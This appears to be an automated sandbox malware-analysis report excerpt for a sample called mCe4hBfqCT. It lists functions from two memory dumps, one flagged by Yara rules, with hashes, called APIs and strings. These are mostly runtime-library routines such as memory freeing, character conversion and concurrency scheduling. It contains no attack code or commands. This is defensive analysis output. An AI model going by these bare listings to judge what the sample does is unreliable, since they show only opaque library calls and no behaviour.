                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                  APIs
                                                  • _free.LIBCMT ref: 03042081
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304208D
                                                  • _free.LIBCMT ref: 03042098
                                                  • _free.LIBCMT ref: 030420A3
                                                  • _free.LIBCMT ref: 030420AE
                                                  • _free.LIBCMT ref: 030420B9
                                                  • _free.LIBCMT ref: 030420C4
                                                  • _free.LIBCMT ref: 030420CF
                                                  • _free.LIBCMT ref: 030420DA
                                                  • _free.LIBCMT ref: 030420E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction ID: 718dfce87047121d8d357de91fa850a28c183d089cf0742b66ec07b4869af600
                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                  • Instruction Fuzzy Hash: 9911A4BE501249AFCB41EF58D952CD93BA5EF44390B0190A1BA188F221DA31DB609F80
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID: f(@$f(@
                                                  • API String ID: 4189289331-2391611762
                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                  • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                  • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                  • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                  • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: 11@$@fB$csm
                                                  • API String ID: 1170836740-1464837749
                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                  APIs
                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 03034AED
                                                    • Part of subcall function 03034DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,03034820), ref: 03034DCC
                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 03034B02
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03034B11
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03034B1F
                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 03034B95
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03034BD5
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03034BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                  • String ID: 11@
                                                  • API String ID: 3151764488-1785270423
                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction ID: 4d7584df0209f1ba402a469962c1b6f5d0bcfafce72facf9bee1d35e8b27bd18
                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction Fuzzy Hash: 6331E639A013159BCF04EF69C881ABDB3BDFF86210F2449A9E9119F251DB70EE05CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                  • Instruction ID: 68a79958962087c969265175c0a6ba4b751149b175187eb848e445fb3374d370
                                                  • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                  • Instruction Fuzzy Hash: 37C1D3B8906345AFCB12DFA8D8407EDBBF4AF4A310F0855E5E414AB391D730EA51CB65
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                  • _free.LIBCMT ref: 004311FD
                                                  • _free.LIBCMT ref: 00431216
                                                  • _free.LIBCMT ref: 00431248
                                                  • _free.LIBCMT ref: 00431251
                                                  • _free.LIBCMT ref: 0043125D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_memcmp
                                                  • String ID: 11@
                                                  • API String ID: 4275183328-1785270423
                                                  • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                  • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                  • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                  • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • _free.LIBCMT ref: 03041464
                                                  • _free.LIBCMT ref: 0304147D
                                                  • _free.LIBCMT ref: 030414AF
                                                  • _free.LIBCMT ref: 030414B8
                                                  • _free.LIBCMT ref: 030414C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID: 11@$C
                                                  • API String ID: 3291180501-2085848483
                                                  • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                  • Instruction ID: 78de516d515a8ce5d511dd482daf63fef72c24dec0507de098f224f3eb35eaca
                                                  • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                  • Instruction Fuzzy Hash: 50B13BB5A022199FDB68DF18D884AADB7F4FF48304F1445EAD949A7350E731AE90CF40
                                                  APIs
                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 03033071
                                                    • Part of subcall function 03028AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 03028ADD
                                                  • SafeSQueue.LIBCONCRT ref: 0303308A
                                                  • Concurrency::location::_Assign.LIBCMT ref: 0303314A
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0303316B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033179
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 3496964030-1785270423
                                                  • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                  • Instruction ID: fe716c577b422d78a7912e233ce8cd9539f50b568c4812bca2df38857fa5f143
                                                  • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                  • Instruction Fuzzy Hash: 713107396027119FCB65EF69C890AAEBBF8FF85710F144599D8468F251DB30E845CBD0
                                                  APIs
                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D49
                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D50
                                                  • PMDtoOffset.LIBCMT ref: 00428D6F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: FindInstanceTargetType$Offset
                                                  • String ID: Bad dynamic_cast!
                                                  • API String ID: 1467055271-2956939130
                                                  • Opcode ID: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                  • Instruction ID: c140271802722e6f94c7424985ceb8b8a000001532c96d06de554d190e41459b
                                                  • Opcode Fuzzy Hash: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                  • Instruction Fuzzy Hash: A02132727062259FCF14DE65F906AAE77A8EF64724B60811FE900D32C1DF3CE805C6A9
                                                  APIs
                                                  • atomic_compare_exchange.LIBCONCRT ref: 0302C6FC
                                                  • atomic_compare_exchange.LIBCONCRT ref: 0302C720
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C731
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C73F
                                                    • Part of subcall function 03011370: __Mtx_unlock.LIBCPMT ref: 03011377
                                                  • std::_Cnd_initX.LIBCPMT ref: 0302C74F
                                                    • Part of subcall function 0302C40F: __Cnd_broadcast.LIBCPMT ref: 0302C416
                                                  • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0302C75D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                  • String ID: 11@
                                                  • API String ID: 4258476935-1785270423
                                                  • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                  • Instruction ID: d665b1671ac39f67b091878393844875aaa9bb9787912eb0eae1adef52f2b9f9
                                                  • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                  • Instruction Fuzzy Hash: 3101F2B9902725A7EB14FB60CD84BEEBB5CAF80310F580151E9049B680EB78EB1587D1
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-316725708
                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                  • __alloca_probe_16.LIBCMT ref: 004321E6
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                  • __alloca_probe_16.LIBCMT ref: 004322CB
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                  • __freea.LIBCMT ref: 0043233B
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  • __freea.LIBCMT ref: 00432344
                                                  • __freea.LIBCMT ref: 00432369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                  • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                  • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                  • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                  • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                  • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                  • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                  • Instruction ID: 91c4edf8fac5bc51b95cdf73606f4ada441ed0d08b97c1a70c3e3b5eba4783da
                                                  • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                  • Instruction Fuzzy Hash: 8661F0B9A42305AFDB60CF68C841B9EBBF8EF45720F1441BAE844EB340E7719E519B50
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                  • __fassign.LIBCMT ref: 00433960
                                                  • __fassign.LIBCMT ref: 0043397B
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                  • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                  • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                  • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                  • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                  • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0304427F,?,?,?,?,?,?), ref: 03043B4C
                                                  • __fassign.LIBCMT ref: 03043BC7
                                                  • __fassign.LIBCMT ref: 03043BE2
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03043C08
                                                  • WriteFile.KERNEL32(?,?,00000000,0304427F,00000000,?,?,?,?,?,?,?,?,?,0304427F,?), ref: 03043C27
                                                  • WriteFile.KERNEL32(?,?,00000001,0304427F,00000000,?,?,?,?,?,?,?,?,?,0304427F,?), ref: 03043C60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                  • Instruction ID: 80e8a2bf63bcd35e5247d1a874af364596f96307f99ba4c5c2315820f433249c
                                                  • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                  • Instruction Fuzzy Hash: 0F51E7B8E01209AFCB10DFA8DC85BEEBBF8EF49310F14416AE555E7291D7309A51CB60
                                                  APIs
                                                  • _SpinWait.LIBCONCRT ref: 0302B172
                                                    • Part of subcall function 030211A8: _SpinWait.LIBCONCRT ref: 030211C0
                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0302B186
                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0302B1B8
                                                  • List.LIBCMT ref: 0302B23B
                                                  • List.LIBCMT ref: 0302B24A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                  • String ID: 6+A
                                                  • API String ID: 3281396844-2819411039
                                                  • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                  • Instruction ID: ae7eda45dccb87162dd3eea8219d989ba5dffb9c0d71435b6cfd56b50937960e
                                                  • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                  • Instruction Fuzzy Hash: 02315936D06766DFCB14EFA8D9906EDFFB1BF84208F48006AC8426B651DB716914CB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                  • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                  • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                  • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                  • Instruction ID: 444fdcd607975854333fe7ef1be37faf6c481d2fb09d37b7419268b16084b730
                                                  • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                  • Instruction Fuzzy Hash: 4111B4BA506216BBDB20AF76DD449AB7ADCEFC7761B104A74FC15DB150DA308A00C6A0
                                                  APIs
                                                    • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                  • _free.LIBCMT ref: 0043A3F1
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 0043A3FC
                                                  • _free.LIBCMT ref: 0043A407
                                                  • _free.LIBCMT ref: 0043A45B
                                                  • _free.LIBCMT ref: 0043A466
                                                  • _free.LIBCMT ref: 0043A471
                                                  • _free.LIBCMT ref: 0043A47C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
APIs
  • Part of subcall function 0304A351: _free.LIBCMT ref: 0304A37A
• _free.LIBCMT ref: 0304A658
  • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
  • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
• _free.LIBCMT ref: 0304A663
• _free.LIBCMT ref: 0304A66E
• _free.LIBCMT ref: 0304A6C2
• _free.LIBCMT ref: 0304A6CD
• _free.LIBCMT ref: 0304A6D8
• _free.LIBCMT ref: 0304A6E3
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412420
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412426
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 00412453
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041245D
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B59,?,?,?,00000000), ref: 0041246F
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 03022687
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 0302268D
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226BA
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226C4
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,03020DC0,?,?,?,00000000), ref: 030226D6
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030226EC
• __CxxThrowException@8.LIBVCRUNTIME ref: 030226FA
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
